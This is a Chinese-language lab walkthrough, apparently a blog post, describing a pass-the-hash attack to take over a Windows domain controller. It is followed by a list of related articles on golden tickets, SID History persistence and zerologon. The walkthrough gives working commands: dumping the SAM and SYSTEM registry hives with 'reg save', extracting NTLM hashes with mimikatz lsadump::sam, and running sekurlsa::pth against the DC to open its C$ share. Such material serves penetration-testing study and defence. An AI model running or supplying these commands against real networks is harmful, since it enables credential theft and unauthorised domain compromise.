mimikatz hash传递--获取域控权限
mimikatz hash传递–获取域控权限
实验环境
实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码)
win_server2008 ip:192.168.3.133 (DC域控,与server2012管理员密码相同,但不知明文密码)
此时,你已经拿下了域内一普通用户win_server2012
实验步骤
1,将mimikatz上传至win_server2012;
2,cd 至mimikatz目录;
3,使用reg命令,将注册表中HKLM下的 SAM与 SYSTEM键值导出保存至 sam.hive和 system.hive
reg save hklm\sam sam.hive
reg save hklm\system system.hive
4,使用mimikatz读取 .hive 注册表文件,以获取本地用户的NTLM hash值;
.\mimikatz "lsadump::sam /system:system.hive /sam:sam.hive" exit
5,使用mimikatz进行hash传递攻击:
.\mimikatz
sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值
例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........
6,攻击成功后,会弹出一个cmd.exe,此时,可以去win2008(DC)的C盘创建一个1.txt,内容为hello world,
回到win2012,进行验证:
1,读取win2008的 C盘以及1.txt内容,注意读取方式
dir \\192.168.3.133\C$
type \\192.168.3.133\C$\1.txt
mimikatz hash传递--获取域控权限相关推荐
- 黄金票据维持域控权限
黄金票据维持域控权限 实验环境:windows2012域控.windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 ...
- 权限维持之:SID History 域控权限维持
权限维持之:SID History 域控权限维持 1 SID 作用 2 利用 SID History 操作过程 3 SID History 权限维持的防御 1 SID 作用 每个用户都有自己的SI ...
- 域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案)...
0x01 前言 mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器.下载链接如下https://github.com/gentilkiwi/mimikatz/relea ...
- 牛红红的日记(平平无奇拿下域控)
牛红红的日记(平平无奇拿下域控) 注:本文首发地址:https://www.sec-in.com 文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们. 一.引文 x年x月x日 晴 我是一只牛, ...
- 内网渗透,横向移动总结(mimikatz域控)
目录 前言 利用windows远程连接命令 ipc连接 at命令 schtasks命令 (在2008及以后的系统中已经将at命令废弃,改用schtasks命令代替了at命令) 利用windows服务 ...
- 【Web安全】内网渗透研究之利用MSF和Impacket工具拿域控
内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 [查看资料] 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路 ...
- 内网渗透测试:域内权限维持思路总结
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows 操作系统 ...
- 一次完整的从webshell到域控的探索之路
前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...
- Windows 内网渗透之攻击域控
文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...
最新文章
- Kafka技术架构那些事儿
- NAnt学习笔记(2) -- 节点的含义解释
- [转]ExtJS Grid 分页时保持选中的简单实现方法
- linux 基本命令学习笔记
- idea 编写javafx_用JavaFX编写图块引擎
- 爬虫图片href是html图片,xpath爬虫实例,爬取图片网站百度盘地址和提取码
- leetcode 480. 滑动窗口中位数(堆+滑动窗口)
- TemplatePart用法说明
- asp.net下载文件的常用方法大全
- HTML特殊字符显示
- 行内元素多出的空白文本节点的解决方法
- 网络是怎样连接的学习笔记1----探索浏览器内部(十分适合理清思路)
- 阿里巴巴 JAVA 开发手册
- 【PID优化】基于蝙蝠 粒子群 花卉授粉算法和布谷鸟搜索算法实现热交换器的PI控制器优化
- ubuntu安装显卡驱动后无法进入系统
- Assimp库中文文档
- kaka的使用以及理解
- 修改微信小程序单选,复选框样式
- iOS app url scheme跳转到淘宝商品详情页 唤醒app
- 24点游戏 java实现_java实现24点纸牌游戏
热门文章
- 基于matlab数据线性拟合回归
- 实习一:6S大气校正
- 装机大师无法发现linux硬盘,华硕电脑进PE系统找不到硬盘的解决办法
- matlab网页视频流,MATLAB - 捕获视频流(MJPEG,rtsp,mpeg)
- (E-R图)实体-联系图(数据模型)
- Angelo Cangelosi:发展型机器人先驱,让机器人模仿儿童学习与发展|42问AI与机器人未来...
- 电脑上不了网了......
- hadoop分布式数据库--佘响平2.1
- 太吾绘卷加载不进去_《太吾绘卷》高难度快速读书以及获得门派支持度方法
- 更新windows补丁时一直卡在搜索更新